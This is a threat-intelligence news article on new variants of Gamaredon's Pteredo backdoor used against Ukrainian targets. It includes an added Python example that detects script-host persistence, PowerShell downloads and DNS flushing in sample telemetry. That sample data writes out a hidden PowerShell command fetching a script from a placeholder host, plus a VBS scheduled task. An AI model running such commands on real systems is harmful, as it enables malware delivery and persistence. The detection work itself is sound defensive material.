New variants of the bespoke Pteredo backdoor are being used by the Russian state-sponsored threat group Gamaredon (a.k.a. Armageddon/Shuckworm) to launch assaults against targets in Ukraine, according to threat analysts.
Since at least 2014, Gamaredon has been conducting cyber-espionage efforts against the Ukrainian government and other key institutions.
The actor is well-known for focusing on Ukraine, with over 5,000 cyberattacks on 1,500 public and commercial entities in the country ascribed to it.
According to a Symantec report, the actor is presently deploying at least four variants of the “Pteredo” malware, also known as Pteranodon.
The backdoor’s origins may be found in Russian hacker forums dating back to 2016, where Shuckworm took it and began privately developing it with specialized DLL modules and functionality for data theft, remote access, and analysis evasion.
Recent events
According to Symantec’s analysts, the different payloads recently delivered against Ukrainian targets perform similar tasks, although each communicates with a distinct command and control (C2) server address.
This suggests the threat actor is using a variety of slightly different payloads to achieve redundancy and to establish persistence that survives malware clean-up procedures.
In all four variants detected, the actor uses disguised VBS droppers that add Scheduled Tasks and subsequently fetch additional modules from the C2 server.
Pteredo.B — A self-extracting 7-Zip archive containing numerous VBScripts focused on data gathering and persistence.
Pteredo.C — A VBScript-based variation that starts with an API hammering routine to avoid running in an analyst’s sandbox, then retrieves and executes PowerShell scripts from external sources.
Pteredo.D — Another VBScript dropper that flushes DNS before fetching payloads, running commands, and erasing evidence of early infection phases.
Pteredo.E — A variation that combines the characteristics of the previous three, such as strong obfuscation and API hammering.
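The behaviours listed for the four variants (a Scheduled Task whose action runs a VBS file through a script host, the script host launching PowerShell to fetch from an external URL, and the script host flushing DNS before the next stage) map onto simple detection rules over endpoint telemetry. The following Python is an added example, not code from the original article or from Symantec; it runs the rules over a constructed, simplified set of task-creation and process-creation events, and the event shape, file names and URL are assumptions made for the example, not indicators from the report.

```python
import re

# Constructed sample telemetry (not from the report): a simplified mix of
# "scheduled task created" events and process-creation events as an EDR or
# Sysmon pipeline might normalise them. Paths and names are made up.
SAMPLE_EVENTS = [
    {"type": "task_created", "task": "\\OneDriveSync",
     "action": r"wscript.exe //B C:\Users\Public\sync.vbs"},
    {"type": "task_created", "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr http://example.invalid/m.ps1\""},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\ipconfig.exe",
     "cmdline": "ipconfig /flushdns"},
    # Benign: a user flushing DNS from a shell launched by Explorer.
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\ipconfig.exe",
     "cmdline": "ipconfig /flushdns"},
]

# Windows script hosts that execute VBScript.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the detection rules this single event triggers."""
    hits = []
    if event["type"] == "task_created":
        action = event["action"].lower()
        # Rule 1: persistence via a Scheduled Task that runs a .vbs file.
        if any(host in action for host in SCRIPT_HOSTS) and ".vbs" in action:
            hits.append("task_runs_vbs")
    elif event["type"] == "process":
        parent = basename(event["parent"])
        image = basename(event["image"])
        cmd = event["cmdline"]
        if parent in SCRIPT_HOSTS:
            # Rule 2: script host spawns PowerShell with a URL on its command line.
            if image == "powershell.exe" and URL_RE.search(cmd):
                hits.append("script_host_powershell_download")
            # Rule 3: script host flushes the DNS cache.
            if image == "ipconfig.exe" and "/flushdns" in cmd.lower():
                hits.append("script_host_flushdns")
    return hits


def scan(events):
    """Return (event index, triggered rules) for every event that matched."""
    findings = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["type"], ", ".join(hits))
```

Each rule on its own is noisy on a busy fleet (administrators do register script-based tasks), so in practice the value comes from correlating the three within a short window on one host, which is exactly the chain the variants share.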
Recent Shuckworm attacks also abused the UltraVNC remote access tool and Microsoft’s Process Explorer, the latter used to manage the processes hosting its DLL modules.
Likenesses to the January campaign
Looking at Shuckworm’s activities against Ukrainian targets since January 2022, it’s simple to conclude that the threat group’s tactics haven’t changed much.
Pteredo backdoor variants were dropped via VBS files hidden inside DOC file attachments on spear-phishing emails in earlier incidents.
In January, self-extracting 7-Zip binaries, which require minimal user interaction, were also employed, as was the misuse of UltraVNC and Process Explorer.
While Shuckworm/Gamaredon is a sophisticated group, its toolset and infection techniques have remained largely unchanged in recent months, which makes detection and defense easier.
However, the Pteredo backdoor is still in active development, and the threat group may be working on a revamped and far more potent or stealthy version of the virus, as well as a new attack chain.